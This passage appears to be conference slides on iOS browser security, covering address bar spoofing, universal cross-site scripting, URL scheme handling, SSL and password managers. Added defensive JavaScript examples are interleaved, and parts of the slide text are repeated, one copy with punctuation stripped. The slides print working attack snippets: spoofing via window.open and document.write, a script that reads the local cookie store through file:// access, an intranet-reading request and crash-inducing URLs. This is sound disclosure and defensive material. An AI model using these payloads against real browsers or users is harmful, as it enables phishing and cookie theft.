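    return { allow: false, reason: 'internal bridge scheme from web content' };
  }
  // registered/external scheme (another app): subresource loads such as
  // <iframe src> are not a user action, so they may not launch it
  if (req.initiator === 'iframe' || !req.userGesture) {
    return { allow: false, reason: 'external scheme without user gesture' };
  }
  return { allow: true, reason: 'external scheme, user-initiated' };
}
```

`http://%5c` is worth a closer look: its percent-encoding is syntactically fine, so only the null check on the parser result catches it, which is exactly the check the crashing code path lacked.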

SSL & password managers
SSL
• By default, invalid certificates for iOS UIWebView https requests are rejected without user interaction
• This can be changed (e.g. allowing a user to accept a self-signed cert)
• 14 of tested browsers: self-signed SSL certificates are silently accepted
• In some cases the validation is done for the main domain only (e.g. Opera Coast < 3.02)
Password managers
• JavaScript runs with the privileges of the top frame —> passwords are not filled for subframes
• Usually possible to force saving a password for another domain (with/without user interaction)
• Password filling checks the domain, but not always the URL scheme (https vs http)
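The three password-manager bullets describe one policy question: what key a saved credential is filed under and what has to match before it is filled. The following is an added example, not code from the slides or from any tested browser: a model vault with the weak behaviour the slides describe (hostname-only matching, filling in any frame, filing a saved entry under the host the form posts to) next to a hardened policy (exact origin including scheme, top frame only, filed under the origin of the document the user actually submitted). The credential values, hostnames and the `ctx` fields (`documentURL`, `isTopFrame`, `formAction`, `userSubmitted`) are assumptions made for the example.

```javascript
// Added example, not code from the original slides: fill and save policy of a
// bolted-on password manager. Weak store: keyed by hostname, filled anywhere.
// Hardened store: keyed by origin (scheme + host + port), top frame only,
// saved under the submitting document's origin. Everything here is constructed.

function originOf(url) {
  const m = /^([a-z][a-z0-9+.-]*):\/\/([^/?#]*)/i.exec(url);
  return m ? (m[1] + '://' + m[2]).toLowerCase() : null;
}

function hostOf(url) {
  const o = originOf(url);
  return o ? o.replace(/^[a-z0-9+.-]+:\/\//, '').replace(/:\d+$/, '') : null;
}

function makeVault() {
  const byOrigin = new Map();   // hardened store: origin -> credential
  const byHost = new Map();     // weak store: hostname -> credential
  return {
    // weak: any scheme, any frame, as long as the hostname matches
    fillWeak(ctx) { return byHost.get(hostOf(ctx.documentURL)) || null; },
    // weak: filed under the host the form posts to, which the page chooses
    saveWeak(ctx, cred) { byHost.set(hostOf(ctx.formAction), cred); return true; },

    // hardened: exact origin (https://bank.tld is not http://bank.tld),
    // and only for the top-level document
    fill(ctx) {
      if (!ctx.isTopFrame) return null;
      return byOrigin.get(originOf(ctx.documentURL)) || null;
    },
    // hardened: filed under the origin of the document the user submitted
    save(ctx, cred) {
      if (!ctx.isTopFrame || !ctx.userSubmitted) return false;
      byOrigin.set(originOf(ctx.documentURL), cred);
      return true;
    },
  };
}

const BANK_CRED = { user: 'alice', pass: 'correct horse' };

// The user really logs in at the bank once; both stores learn the credential.
function setupVault() {
  const v = makeVault();
  const login = { documentURL: 'https://bank.tld/login', formAction: 'https://bank.tld/login', isTopFrame: true, userSubmitted: true };
  v.save(login, BANK_CRED);
  v.saveWeak(login, BANK_CRED);
  return v;
}

// Scenario 1: same host over plain http (downgraded or spoofed page)
function fillOverHttp(v) {
  const ctx = { documentURL: 'http://bank.tld/login', isTopFrame: true };
  return { weak: v.fillWeak(ctx), hardened: v.fill(ctx) };
}

// Scenario 2: the genuine login page framed by an attacker's page
function fillInSubframe(v) {
  const ctx = { documentURL: 'https://bank.tld/login', isTopFrame: false };
  return { weak: v.fillWeak(ctx), hardened: v.fill(ctx) };
}

// Scenario 3: attacker page submits a form whose action is the bank, to plant
// a credential that will later be filled on the real site
function plantCredential(v) {
  const ctx = { documentURL: 'http://attacker.tld/', formAction: 'https://bank.tld/login', isTopFrame: true, userSubmitted: true };
  const planted = { user: 'mallory', pass: 'planted' };
  v.saveWeak(ctx, planted);
  v.save(ctx, planted);
  const bank = { documentURL: 'https://bank.tld/login', isTopFrame: true };
  return { weak: v.fillWeak(bank), hardened: v.fill(bank) };
}
```

The weak store leaks the bank password to an http page and to a framed login, and lets a third-party page overwrite the bank's entry; the hardened store does none of that while still filling the genuine top-level https page.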

Summary
• UIWebViews should be replaced with iOS 8 WKWebViews in browser applications
• Most 3rd-party iOS browsers are experimental or side projects, built with less attention to detail
• Mobile device management and other enterprise solutions often include a browser application. Did you test it?

References
• https://developer.apple.com/library/ios/documentation/AppleApplications/Reference/SafariWebContent/
• https://developer.apple.com/library/ios/documentation/UIKit/Reference/UIWebView_Class/Reference/Reference.html
• https://developer.apple.com/library/ios/documentation/UIKit/Reference/UIWebViewDelegate_Protocol/Reference/Reference.html
• https://developer.apple.com/library/mac/documentation/corefoundation/Reference/CFURLRef/Reference/reference.html
• https://developer.apple.com/library/prerelease/ios/documentation/WebKit/Reference/WKWebView_Ref/index.html
• https://code.google.com/p/browsersec/
• http://www.w3.org/TR/CSP/
• http://www.slideshare.net/iphonepentest/ios-application-insecurity
• https://labs.mwrinfosecurity.com/blog/2012/04/16/adventures-with-ios-uiwebviews/
• http://www.shmoo.com/idn/
• http://blog.chromium.org/2008/12/security-in-depth-local-web-pages.html
• http://research.microsoft.com/pubs/73101/guilogicsecurity.pdf
• http://gs.statcounter.com/
• https://code.google.com/p/chromium/issues/detail?id=146760
• https://code.google.com/p/chromium/issues/detail?id=147625
• https://code.google.com/p/chromium/issues/detail?id=324969
• https://code.google.com/p/chromium/issues/detail?id=326118
• https://code.google.com/p/chromium/issues/detail?id=326125
• https://code.google.com/p/chromium/issues/detail?id=348640
• http://blogs.opera.com/mobile/2014/05/opera-coast-updated-3-02/
• http://www.f-secure.com/en/web/labs_global/fsc-2014-4
• http://browser-shredders.blogspot.com/
• https://ios.browsr-tests.com/

Questions?
lukasz.pilorz@runic.pl, pawel.wylecial@gmail.com
Twitter: @runicpl, @h0wlu
Thank you
bull Downloads opened directly from file
UXSS Universal Cross-Site Scripting
Content-Disposition attachmentbull displayed in the origin of hosting site (iOS lt 5)
CVE-2011-3426 Christian Matthies Yoshinori Oota
bull isolated attachment origin (iOS 5 +)
bull documentlocationhref
bull documentreferrer
bull w=windowopen(lsquohttpsrsquo+locationhostname) wdocumentwrite(lsquocustom SOP implementationrsquo)
UXSS Universal Cross-Site Scripting
Content-Typebull textplain
HTML (iOS lt 7) CVE-2013-5151 Ben Toews
bull applicationoctet-stream HTML
bull applicationother filenamehtml
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgta = documentlocationhrefsplit() if(a[0]===file) path = lsquofile+a[3]++a[4]++a[5]++a[6]+rsquo+a[7] path = path+LibraryCookiesCookiesbinarycookies x = new XMLHttpRequest() xopen(GET path false) xsend() alert(xresponseText) ltscriptgt
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgt x = new XMLHttpRequest() xopen(lsquoGET lsquohttpsyourintranet false) xsend() alert(xresponseText)ltscriptgt
UXSS Universal Cross-Site Scripting
ChallengeHijack password autofill
UXSS Universal Cross-Site Scripting
Opening local HTML files safely
bull Open as textplain
bull Content-Security-Policy header HTML5 sandbox
bull baseURL = aboutblank
bull iOS8 WKWebViewconfigurationpreferencesjavaScriptEnabled = false
UXSS Universal Cross-Site Scripting
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
Popups amp URL handling
Popups amp URL handling
bull Browsers rewriting href attributes for target=_blank can be usually tricked into believing navigation was initiated by user
bull ltiframe src=ldquogooglechromeexamplecomrdquogtltiframe src=ldquomercexamplecomrdquogtetc bypass all popup blockers anywayhellip
Popup blockers
Popups amp URL handling
Application(bolted-on)
Native (WebKit)
bull schemedownloadhttpssecuretldvictimdata schemedownloadhttpattackertldREADMEhtml
bull schemeadd-filterurl=
Bridge (internal)
URI schemes
Popups amp URL handling
Registered(external)
CFURL Null Pointer Dereferencebull Any CFURL function that gets NULL as an argument
will cause Null Pointer Dereference
bull Tested with percent encodinghttp http5 http5c etc
bull Example Opera Coast ltscriptgtdocumentlocation = lsquohttp5crsquoltscriptgt
Popups amp URL handling
Opera Coast
Program received signal EXC_BAD_ACCESS Could not access memory
Reason KERN_INVALID_ADDRESS at address 0x00000000
0x2f3e0d76 in CFURLCopyPath()
Popups amp URL handling
bull Special guest star Safari on OS X Mavericksbefore Security Update 2014-02 (CVE-2014-1315)
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
SSLbull By default invalid certificates for iOS UIWebView
https requests are rejected without user interaction
bull This can be changed (eg allowing a user to accept self-signed cert)
bull 14 of tested browsersself-signed SSL certificates are silently accepted
bull In some cases the validation is done for main domain only (eg Opera Coast lt 302)
SSL amp password managers
SSL amp password managers
Password managers
bull JavaScript with privileges of top frame mdashgt passwords not filled for subframes
bull Usually possible to force saving password for another domain (withwithout user interaction)
bull Password filling checks for domain but not always for URL scheme (https vs http)
SSL amp password managers
SSL amp password managers
Summary
bull UIWebViews should be replaced with iOS8 WKWebViews in browser applications
bull Most 3rd party iOS browsers are experimental or side projects built with less attention to detail
bull Mobile device management and other enterprise solutions often include a browser application Did you test it
Mobile Browsers Security iOS
Referencesbull httpsdeveloperapplecomlibraryiosdocumentation
AppleApplicationsReferenceSafariWebContent
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebView_ClassReferenceReferencehtml
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebViewDelegate_ProtocolReferenceReferencehtml
bull httpsdeveloperapplecomlibrarymacdocumentationcorefoundationReferenceCFURLRefReferencereferencehtml
bull httpsdeveloperapplecomlibraryprereleaseiosdocumentationWebKitReferenceWKWebView_Refindexhtml
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompbrowsersec
bull httpwwww3orgTRCSP
bull httpwwwslidesharenetiphonepentestios-application-insecurity
bull httpslabsmwrinfosecuritycomblog20120416adventures-with-ios-uiwebviews
bull httpwwwshmoocomidn
bull httpblogchromiumorg200812security-in-depth-local-web-pageshtml
bull httpresearchmicrosoftcompubs73101guilogicsecuritypdf
bull httpgsstatcountercom
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompchromiumissuesdetailid=146760
bull httpscodegooglecompchromiumissuesdetailid=147625
bull httpscodegooglecompchromiumissuesdetailid=324969
bull httpscodegooglecompchromiumissuesdetailid=326118
bull httpscodegooglecompchromiumissuesdetailid=326125
bull httpscodegooglecompchromiumissuesdetailid=348640
bull httpblogsoperacommobile201405opera-coast-updated-3-02
bull httpwwwf-securecomenweblabs_globalfsc-2014-4
Mobile Browsers Security iOS
References
bull httpbrowser-shreddersblogspotcom
bull httpsiosbrowsr-testscom
Mobile Browsers Security iOS
Questions
Mobile Browsers Security iOS
lukaszpilorzrunicpl pawelwylecialgmailcom
Twitter runicpl h0wlu
Thank you
Mobile Browsers Security iOS
UIWebView & WKWebView

iOS 8 beta: WKWebView
• configuration.preferences
• configuration.userContentController
• navigationDelegate
• UIDelegate
• URL (KVO)
• hasOnlySecureContent (KVO)
Bolted-on by the browsers
• Address bar
• Multiple tabs
• Downloads
• Support for untrusted SSL certificates
• Autocomplete & password manager
• … and many more features (safety ratings, malware protection, cloud integration, …)

Testing
• Inspiration from Browser Security Handbook
• Retesting previous Mobile Safari bugs
• “Black-box” testing from web perspective, review of JavaScript code, a bit of reversing/debugging
• Cross-browser test cases: https://iosbrowsr-tests.com
In this presentation
• iOS Browsers: UIWebView, WKWebView
• Address Bar Spoofing
• Universal Cross-Site Scripting
• Popups & URL handling
• SSL & password managers
Address Bar Spoofing

Address bar spoofing
• Look-alike (IDN etc.)
• URL tracking desynchronization

URL tracking desynchronization
• Navigate to untracked content
• Initiate navigation, interrupt, overwrite content
• Failed navigation
• Loading loop
• Lots of other methods (race conditions, history, …)
• Most of them known for over 10 years (IE, Netscape)

Address Bar Spoofing: Untracked Content
Replace window content with untracked content; document.write and/or data: URIs are usually good candidates
• w = window.open('https://accounts.google.com'); setTimeout(function(){ w.document.write(…) }, …)
• CVE-2013-5152 Mobile Safari Address Bar Spoofing: reported in iOS 5.1.1, fixed in iOS 7
Address Bar Spoofing: Init & Interrupt
Initialise window with target URL, replace with phishing content before it loads
• w = window.open('https://accounts.google.com'); w.document.write(…)
Optionally fall back to native window.open:
• delete window.open; w = window.open('https://accounts.google.com'); w.document.write(…)

Init & Interrupt
• CVE-2013-6895 Kaspersky Safe Browser
• CVE-2013-6898 F-Secure Safe Browser
• CVE-2013-6897 Dolphin Browser
• … and 45 of tested browsers
• Special guest star: Google Chrome for Android, CVE-2013-6642
Bug Bounty :-)
Address Bar Spoofing: Failed Navigation
Incorrect URL often remains in address bar after navigation errors
• DNS NXDOMAIN - host not found (https://login.target.tld)
• TCP port closed (https://www.target.tld:448)
• SSL errors (https://target.tld)
• Display phishing page, then redirect to “incorrect” URL
• Mobile Safari before iOS 7: window.focus() or window.open().close() allowed suppressing error alerts

Address Bar Spoofing: Loading loop
• HTTP request timeout in iOS browsers is usually between 1 and 10 minutes
• Address bar in Mobile Safari and many other iOS browsers is updated on navigation attempt, even before an actual connection is made
• Now we only need to find a target with filtered port 443
• Or any filtered port, because Mobile Safari shows only the hostname part of the URL
• document.write('Phishing page here'); location = 'https://accounts.google.com:8443'; setInterval(function(){ location = 'https://accounts.google.com:8443' }, …)

Phishing page: title bar
<title>https://www.apple.com</title>

Address bar tips
• Display the URL that is currently loaded within UIWebView, not the one you think will be there
• UIWebViewDelegate: update address bar on each event, including webView:didFailLoadWithError:
• Displaying SSL lock makes sense if there was an actual successful and valid SSL connection. Spoofing https URL seems easy, don't make it worse by automatically adding SSL lock
• iOS 8: KVO-compliant WKWebView.URL property
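The address-bar bookkeeping those tips describe, as an added example (not code from the slides or from any of the browsers they discuss). The bar shows only what the web view has actually loaded, is updated from every UIWebViewDelegate event including the failure callback, and shows a lock only after a successful, valid https load. Method names mirror the delegate methods; the webView objects passed in are constructed stand-ins carrying just the two fields the logic needs (request.mainDocumentURL and a tlsValid flag, the latter this example's placeholder for the app's certificate check).

```javascript
// Added example: address-bar state driven by UIWebViewDelegate-style events.
// Not code from the slides; webView stand-ins and the tlsValid flag are assumptions.

class AddressBar {
  constructor() {
    this.committed = 'about:blank'; // URL of the document the web view is showing
    this.pending = null;            // URL of a navigation that started but has not finished
    this.secure = false;            // lock icon state
    this.lastError = null;          // { url, error } of the most recent failed navigation
  }

  // webView:shouldStartLoadWithRequest:navigationType:
  // The destination is remembered as pending but NOT displayed as the current URL;
  // that is what defeats the loading-loop and failed-navigation spoofs.
  shouldStartLoad(request) {
    this.pending = request.mainDocumentURL;
    return true;
  }

  // webViewDidStartLoad: nothing to commit yet; the lock goes away until the load ends.
  didStartLoad() {
    this.secure = false;
  }

  // webViewDidFinishLoad: read the URL back from the web view rather than trusting
  // the request that was asked for (redirects, document.write, data: URLs).
  didFinishLoad(webView) {
    this.committed = webView.request.mainDocumentURL;
    this.pending = null;
    this.lastError = null;
    // Lock only for https AND a validated TLS session (tlsValid is the stand-in).
    this.secure = this.committed.startsWith('https://') && webView.tlsValid === true;
  }

  // webView:didFailLoadWithError: the slide's point is to update the bar here too.
  // The failed destination is dropped, the bar keeps the document still rendered,
  // and the error is exposed so the UI can show it instead of staying silent.
  didFailLoad(webView, error) {
    this.lastError = { url: this.pending || webView.request.mainDocumentURL, error };
    this.pending = null;
    this.secure = false; // conservative: no lock until a load completes again
  }

  // Cross-tab document.write or a data: URL replaced the content with untracked
  // content: the tab no longer shows the URL it used to.
  contentReplaced() {
    this.committed = 'about:blank';
    this.pending = null;
    this.secure = false;
  }

  // What the UI renders.
  display() {
    return {
      url: this.committed,
      pendingURL: this.pending, // show as progress, never as the address
      showLock: this.secure && this.pending === null,
    };
  }
}
```

Driving the model with the loading-loop sequence from the slides (attacker page committed, navigation to a filtered port that never completes) keeps the attacker's URL in the bar with no lock, and a later successful https load with a valid chain is the only state that turns the lock on.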
UXSS: Universal Cross-Site Scripting

Universal Cross-Site Scripting
XSS enables attackers to inject client-side script into web pages viewed by other users, bypassing same-origin policy.
In UXSS the attacker exploits a vulnerability in the browser, not in the website
(~ http://en.wikipedia.org/wiki/Cross-site_scripting)
Famous after PDF UXSS in 2007
• CVE-2013-6893 UXSS in Mercury Browser for iOS
• CVE-2013-7197 UXSS in Yandex.Browser for iOS
• CVE-2012-2899 UXSS in Google Chrome for iOS
• …
CVE-2013-6893: UXSS in Mercury Browser
w = window.open('about:blank')
mbexec$(WINDOW_ID)[{ "command": "window.open", "target": 1234, "url": "about:blank" }]
Math.random()
[webView loadRequest: … "about:blank" …]
cross-frame forgery

w.document.write('Hi')
mbexec$(WINDOW_ID)[{ "command": "window.document.write", "target": 1234, "html": "Hi" }]
[webView stringByEvaluatingJavaScriptFromString: @"document.write('Hi')"]

Mercury Browser for iOS does not implement same-origin policy restrictions for cross-tab calls. Any at all.
w = window.open('https://accounts.google.com'); w.document.write('<script src=…></script>') … and it just works in accounts.google.com
CVE-2013-7197: UXSS in Yandex.Browser
• Same-origin check implemented on window.open()
• Not rechecked on window.document.write()
• Redirect child window after window.open() → UXSS
Bug Bounty :-)
CVE-2012-2899: UXSS in Google Chrome
• w = window.open(location.href); w.document.write('Hi')
• [webView loadHTMLString:@"Hi" baseURL:href]

• w = window.open('about:blank'); w.document.write(…)
• about:blank is kind of “no URL”, right?
• [webView loadHTMLString:@"…" baseURL:nil]

• For baseURL = nil, UIWebView loads the applewebdata:// origin. Same as file:// - no same-origin policy, access to any web origin and local files

• w = window.open('about:blank'); w.document.write('<script>document.write(location.href)</script>')
• applewebdata:// origin
• UXSS + local file access (application sandbox / jailbreak)
Bug Bounty :-)

Safe cross-tab document.write
• w = window.open(location.href); w.document.write('Hi')
• [webView loadHTMLString:@"Hi" baseURL:[NSURL … "about:blank"]]
• iOS 8: use WKWebView UIDelegate webView:createWebViewWithConfiguration:forNavigationAction:windowFeatures:
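The cross-tab bridge with the checks the three UXSS cases above call for, as an added example (not code from the slides or from Mercury, Yandex.Browser or Chrome). It models the JavaScript-to-native bridge a UIWebView-based browser uses for cross-tab window.open()/document.write() (the mbexec$ calls on the Mercury slides) with the same-origin policy checked on every cross-tab call rather than only on open (Mercury), checked against the target tab's URL at the time of the call rather than the URL it was opened with (Yandex), and with a baseURL that is never nil, since about:blank is not "no URL" (Chrome). TabRegistry, openTab, navigate and documentWrite are this example's own names.

```javascript
// Added example: cross-tab bridge that enforces SOP at call time and never yields a
// nil baseURL. Not code from the slides; class and method names are assumptions.

const OPAQUE = 'null'; // origin of documents that must not match anything

// Origin as the bridge compares it: scheme://host[:port] for http(s); everything
// else (about:blank, applewebdata:, file:, unparseable input) is opaque.
function originOf(url) {
  let u;
  try { u = new URL(url); } catch (e) { return OPAQUE; }
  if (u.protocol !== 'http:' && u.protocol !== 'https:') return OPAQUE;
  return u.origin;
}

class TabRegistry {
  constructor() { this.tabs = new Map(); this.nextId = 1; }

  // A tab created by the native side (user typed a URL, restored session, ...).
  createTab(url) {
    const id = this.nextId++;
    this.tabs.set(id, { url, opener: null, navigated: false });
    return id;
  }

  // Bridge command "window.open": the child starts as the opener's about:blank page
  // and may be written into by the opener only until it navigates anywhere.
  openTab(callerId, url) {
    const id = this.nextId++;
    this.tabs.set(id, { url: 'about:blank', opener: callerId, navigated: false });
    if (url !== 'about:blank') this.navigate(id, url);
    return id;
  }

  // Every navigation the native side observes (redirects included) is recorded,
  // so a later document.write is judged against where the tab really is.
  navigate(id, url) {
    const tab = this.tabs.get(id);
    if (!tab) return false;
    tab.url = url;
    tab.navigated = true;
    return true;
  }

  // Bridge command "window.document.write". Returns what the native side should pass
  // to loadHTMLString:baseURL:, or { allowed: false } with the reason for the denial.
  documentWrite(callerId, targetId, html) {
    const caller = this.tabs.get(callerId);
    const target = this.tabs.get(targetId);
    if (!caller || !target) return { allowed: false, reason: 'unknown tab' };
    const callerOrigin = originOf(caller.url);
    if (callerOrigin === OPAQUE) return { allowed: false, reason: 'caller has no web origin' };
    // Rechecked on every call, against the target's current URL (the Yandex lesson).
    const sameOrigin = originOf(target.url) === callerOrigin;
    const blankChild = target.opener === callerId && !target.navigated;
    if (!sameOrigin && !blankChild) return { allowed: false, reason: 'cross-origin target' };
    // A blank child keeps an about:blank base (an opaque origin, as on the "Safe
    // cross-tab document.write" slide); a same-origin target keeps its own URL.
    // Neither path ever yields nil, so the applewebdata: origin is unreachable.
    const baseURL = blankChild ? 'about:blank' : target.url;
    return { allowed: true, baseURL, html };
  }
}
```

The native side keeps calling navigate() from its delegate callbacks; the registry then refuses the Mercury write into accounts.google.com, the Yandex write into a child that was redirected after window.open(), and any write from a file: or applewebdata: caller, while a write into the caller's own blank child or its own origin goes through with a concrete baseURL.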
Other potential paths to applewebdata:// or file:// origin
• baseURL: [NSURL URLWithString:@"http://example.com"] → nil
• CFURLCreateWithString(kCFAllocatorDefault, CFSTR("http://example.com"), NULL) → NULL
• Downloads opened directly from file://

Content-Disposition: attachment
• displayed in the origin of hosting site (iOS < 5): CVE-2011-3426, Christian Matthies, Yoshinori Oota
• isolated attachment origin (iOS 5+):
  • document.location.href
  • document.referrer
  • w = window.open('https://' + location.hostname); w.document.write('custom SOP implementation')

Content-Type
• text/plain → HTML (iOS < 7): CVE-2013-5151, Ben Toews
• application/octet-stream → HTML
• application/other, filename .html
JS without Same-Origin-Policy
<script>
a = document.location.href.split('/');
if (a[0] === 'file:') {
  path = 'file:///' + a[3] + '/' + a[4] + '/' + a[5] + '/' + a[6] + '/' + a[7];
  path = path + '/Library/Cookies/Cookies.binarycookies';
  x = new XMLHttpRequest(); x.open('GET', path, false); x.send();
  alert(x.responseText);
}
</script>

<script>
x = new XMLHttpRequest(); x.open('GET', 'https://your.intranet/', false); x.send();
alert(x.responseText);
</script>

Challenge: Hijack password autofill

Opening local HTML files safely
• Open as text/plain
• Content-Security-Policy header, HTML5 sandbox
• baseURL = about:blank
• iOS 8: WKWebView configuration.preferences.javaScriptEnabled = false
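A rendering policy for downloaded files that applies the "Content-Disposition", "Content-Type" and "Opening local HTML files safely" slides, as an added example (not code from the slides or from any browser). The input shape, the function names and the table of markup types are this example's own. The returned policy is what the app would feed to loadData:MIMEType:textEncodingName:baseURL: on UIWebView or to a WKWebViewConfiguration: an explicit MIME type, a non-nil about:blank base and JavaScript switched off, so nothing downloaded runs in a file:// or applewebdata: origin.

```javascript
// Added example: choose how to render a download so it never executes as HTML in a
// local origin. Not code from the slides; names and the type table are assumptions.

const HTML_TYPES = new Set(['text/html', 'application/xhtml+xml', 'image/svg+xml']);
const HTML_NAME = /\.(x?html?|xht|svg)$/i;

// "text/html; charset=utf-8" -> "text/html"; missing header -> ""
function mediaType(contentType) {
  return (contentType || '').split(';')[0].trim().toLowerCase();
}

function isAttachment(contentDisposition) {
  return /^\s*attachment\b/i.test(contentDisposition || '');
}

// True for anything WebKit would treat as markup when opened from disk: a declared
// HTML type, or a generic type (application/octet-stream, application/other) whose
// file name ends in .html, which the slides show being sniffed as HTML.
function wouldRenderAsHTML(type, filename) {
  return HTML_TYPES.has(type) || HTML_NAME.test(filename || '');
}

function renderPolicy({ contentType, contentDisposition, filename }) {
  const type = mediaType(contentType);
  const policy = {
    mimeType: type || 'application/octet-stream',
    baseURL: 'about:blank',   // never nil and never the file:// path of the download
    javaScriptEnabled: false, // WKWebView: configuration.preferences.javaScriptEnabled = false
    // Header value to send if the app serves the file to the web view over HTTP
    // (the CSP sandbox directive is header-only).
    csp: "default-src 'none'; sandbox",
    reason: 'declared type, script disabled',
  };
  if (wouldRenderAsHTML(type, filename) || isAttachment(contentDisposition)) {
    // Show the bytes instead of rendering them: the first option on the
    // "Opening local HTML files safely" slide.
    policy.mimeType = 'text/plain';
    policy.reason = isAttachment(contentDisposition) ? 'attachment shown as text' : 'markup shown as text';
  } else if (type === 'text/plain' || type === '') {
    // UIWebView before iOS 7 rendered text/plain as HTML (CVE-2013-5151);
    // declare the type explicitly so the web view does not sniff.
    policy.mimeType = 'text/plain';
    policy.reason = 'plain text declared explicitly';
  }
  return policy;
}
```

Running it over the cases from the slides: application/octet-stream with a README.html name, application/other with an .HTML name and a text/html attachment all come back as text/plain with an about:blank base, a PDF keeps its declared type but still gets no script, and a response with no Content-Type at all is declared plain text rather than left for sniffing.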
Popups & URL handling

Popup blockers
• Browsers rewriting href attributes for target=_blank can usually be tricked into believing navigation was initiated by user
• <iframe src="googlechrome://example.com">, <iframe src="merc://example.com">, etc. bypass all popup blockers anyway…
URI schemes
• Native (WebKit)
• Application (bolted-on): Bridge (internal), Registered (external)
• scheme://download/https://secure.tld/victim/data, scheme://download/http://attacker.tld/README.html
• scheme://add-filter?url=…

CFURL Null Pointer Dereference
• Any CFURL function that gets NULL as an argument will cause Null Pointer Dereference
• Tested with percent encoding: http://%, http://%5, http://%5c etc.
• Example: Opera Coast <script>document.location = 'http://%5c'</script>
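The gate a browser app's JavaScript bridge should put in front of every URL it hands to native code, as an added example (not code from the slides or from any browser) covering two slides of this section: "Popups & URL handling", where custom schemes in an iframe reach the app's own bridge commands or other apps' registered handlers with no user gesture, and "CFURL Null Pointer Dereference", where a string CFURL cannot parse comes back as NULL and the next CFURL call on it crashes. The scheme tables, the option names and the "myapp-" bridge schemes are this example's assumptions.

```javascript
// Added example: validate and classify URLs before they leave the web view.
// Not code from the slides; scheme names and options are assumptions.

const WEB_SCHEMES = new Set(['http:', 'https:']);
// Internal bridge commands the app itself implements (hypothetical names).
const BRIDGE_SCHEMES = new Set(['myapp-download:', 'myapp-add-filter:']);
// A percent sign not followed by two hex digits is what makes CFURL return NULL
// ("http://%", "http://%5"); reject it here so native code never sees it.
const BAD_ESCAPE = /%(?![0-9A-Fa-f]{2})/;

// Decide what to do with a URL the page asked the browser to open.
//   userGesture  - the navigation came from a tap the app itself observed
//   from Subframe - the request originated in an <iframe>, not the top document
function classifyURL(raw, { userGesture = false, fromSubframe = false } = {}) {
  if (typeof raw !== 'string') return { action: 'reject', reason: 'not a string' };
  if (BAD_ESCAPE.test(raw)) return { action: 'reject', reason: 'invalid percent-encoding' };
  let url;
  try { url = new URL(raw); } catch (e) {
    return { action: 'reject', reason: 'unparseable URL' };
  }
  if (WEB_SCHEMES.has(url.protocol)) {
    // Ordinary navigation: WebKit's own popup rules apply, nothing else to gate.
    return { action: 'load', url: url.href };
  }
  // Everything below leaves the web view: an internal command or another app.
  if (!userGesture || fromSubframe) {
    return { action: 'reject', reason: 'non-web scheme without a user gesture in the top frame' };
  }
  if (BRIDGE_SCHEMES.has(url.protocol)) {
    // The payload of a bridge command is itself a URL (the download and add-filter
    // examples on the slide), so it goes through the same gate before the command runs.
    const carried = url.pathname || url.searchParams.get('url');
    const payload = classifyURL(carried, { userGesture, fromSubframe });
    if (payload.action !== 'load') return { action: 'reject', reason: 'bridge payload is not a web URL' };
    return { action: 'bridge', command: url.protocol.slice(0, -1), url: payload.url };
  }
  return { action: 'external', url: url.href };
}
```

With this in place the malformed strings from the CFURL slide are rejected before any CFURL call, a googlechrome:// iframe is dropped for lack of a gesture while the same scheme from a tap in the top frame is handed on as an external app launch, and a bridge download command is only executed when the URL it carries is itself a clean http(s) URL.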
Opera Coast:
Program received signal EXC_BAD_ACCESS, Could not access memory.
Reason: KERN_INVALID_ADDRESS at address: 0x00000000
0x2f3e0d76 in CFURLCopyPath ()

• Special guest star: Safari on OS X Mavericks before Security Update 2014-02 (CVE-2014-1315)
<iframe src="lets-try-format-string:%p%p%p%p…">
SSL & password managers

SSL
• By default, invalid certificates for iOS UIWebView https requests are rejected without user interaction
• This can be changed (e.g. allowing a user to accept self-signed cert)
• 14 of tested browsers: self-signed SSL certificates are silently accepted
• In some cases the validation is done for main domain only (e.g. Opera Coast < 3.02)

Password managers
• JavaScript with privileges of top frame → passwords not filled for subframes
• Usually possible to force saving password for another domain (with/without user interaction)
• Password filling checks for domain, but not always for URL scheme (https vs http)
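The matching rule the "Password managers" slide implies, as an added example (not code from the slides or from any browser's password manager): credentials are keyed by full origin (scheme, host and port, so https://bank.tld and http://bank.tld never share an entry), saved only for the origin of the top document that actually submitted the form, and filled only into the top frame. The store layout and function names are this example's own.

```javascript
// Added example: origin-keyed credential save/fill for a bolted-on password manager.
// Not code from the slides; store layout and names are assumptions.

// Origin key for http(s) documents; null for about:blank, file:, applewebdata: or
// anything that does not parse, so such documents neither save nor receive entries.
function credentialKey(url) {
  let u;
  try { u = new URL(url); } catch (e) { return null; }
  if (u.protocol !== 'http:' && u.protocol !== 'https:') return null;
  return u.origin; // scheme + host + port
}

// Called from the form-submission hook. The origin comes from the top document the
// native side reports, never from a domain the page supplies, which closes the
// "force saving a password for another domain" trick.
function saveCredential(store, topDocumentURL, username, password) {
  const key = credentialKey(topDocumentURL);
  if (key === null) return false;
  store.set(key, { username, password });
  return true;
}

// Called when a login form is found. frame = { url, isTopFrame }.
function credentialFor(store, frame) {
  if (!frame.isTopFrame) return null; // the injected JS has top-frame privileges only
  const key = credentialKey(frame.url);
  if (key === null) return null;
  return store.get(key) || null;
}
```

An entry saved on https://bank.tld is returned for a later https://bank.tld top-frame login and for nothing else: not for http://bank.tld, not for a different port, and not for the same origin loaded inside a subframe.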
Summary
• UIWebViews should be replaced with iOS 8 WKWebViews in browser applications
• Most 3rd party iOS browsers are experimental or side projects built with less attention to detail
• Mobile device management and other enterprise solutions often include a browser application. Did you test it?
References
• https://developer.apple.com/library/ios/documentation/AppleApplications/Reference/SafariWebContent
• https://developer.apple.com/library/ios/documentation/UIKit/Reference/UIWebView_Class/Reference/Reference.html
• https://developer.apple.com/library/ios/documentation/UIKit/Reference/UIWebViewDelegate_Protocol/Reference/Reference.html
